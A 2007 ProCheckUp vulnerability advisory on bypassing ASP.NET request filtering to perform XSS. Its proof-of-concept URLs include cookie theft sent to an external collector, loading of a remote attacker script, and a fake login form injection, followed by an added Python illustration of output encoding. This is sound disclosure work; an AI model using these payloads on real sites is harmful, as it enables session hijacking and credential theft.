Friday 21 November 2008

PR07-03: Microsoft ASP.NET request filtering can be bypassed allowing XSS and HTML injection attacks

This advisory has been published following consultation with UK CPNI (formerly known as NISCC)

Date Found: November 2005

Date Public: 5th April 2007

Severity: Medium

CVE reference: CVE-2006-7192

BID: 20753

Vulnerable:

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 Standard Edition Build 3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11

Authors:

Request filtering bypass found by Richard Brain and further researched by Jan Fry and Adrian Pastor

Description:

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application set up in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customers' live environments.

Notes:

In order to exploit this flaw, an attacker would need to target a .NET server-side application which does not properly sanitize input parameters before returning them to the web browser.

Proof of concept:

In the following examples 'vuln-search.aspx' is a script that solely relies on ASP .NET request filtering, and returns user-supplied input back to the browser.

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Redirection Attack
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com")>

Cookie stealing
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
(document.createElement("script")))>
</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>

where 'xss.js' could contain a snippet that overwrites the entire document's HTML body, for example:

document.body.innerHTML = '<b>since we can now insert brackets without having to escape the request filtering, we\'re free to insert any HTML tags</b></br><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"></br><input type="submit" value="Log in"></form>';
myform.login.focus();

Consequences:

Attackers can hijack user accounts through XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET request filtering.
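As an added illustration (not part of the advisory), the following Python contrasts an echo handler that relies only on a request filter with one that HTML-encodes its output at render time, using the advisory's first proof-of-concept payload as input. The blacklist rule is a deliberately simplified stand-in, not Microsoft's validation code, and the handler names are hypothetical.

```python
import html
import re

# First proof-of-concept payload from the advisory above. It passed ASP .NET 2.0
# request filtering at the time and was rendered by the browser as markup.
POC_PAYLOAD = "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"

# Assumed, simplified stand-in for a blacklist request filter: reject a '<'
# that is directly followed by a letter. This is NOT Microsoft's actual rule;
# it only illustrates why a denylist cannot be the sole defence.
_TAG_START = re.compile(r"<[A-Za-z]")


def blacklist_filter_accepts(value: str) -> bool:
    """Return True when the (assumed) blacklist would let the value through."""
    return _TAG_START.search(value) is None


def render_vulnerable(term: str) -> str:
    """'vuln-search.aspx' style handler: echoes the parameter unencoded,
    relying solely on the request filter having run beforehand."""
    return f"<p>Results for: {term}</p>"


def render_encoded(term: str) -> str:
    """Hardened handler: HTML-encode at output time regardless of what any
    request filter did (the ASP .NET equivalent is HttpUtility.HtmlEncode)."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def contains_markup(rendered_fragment: str) -> bool:
    """True if the echoed term still contributes tag delimiters or an
    attribute-breaking quote to the page (a crude but sufficient check)."""
    inner = rendered_fragment[len("<p>Results for: "):-len("</p>")]
    return any(c in inner for c in "<>\"'")


if __name__ == "__main__":
    print("filter accepts payload:", blacklist_filter_accepts(POC_PAYLOAD))
    print("vulnerable :", render_vulnerable(POC_PAYLOAD))
    print("encoded    :", render_encoded(POC_PAYLOAD))
```

The encoded output turns every `<`, `>` and quote in the payload into a character reference, so the browser shows the text instead of parsing a tag, whichever filter rules ran on the request.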

Fix:

http://www.microsoft.com/technet/security/Bulletin/MS07-040.mspx

References:

http://www.procheckup.com/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project

Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community
for the purpose of alerting them to problems, if and only if, the Bulletin is not edited
or changed in any way, is attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
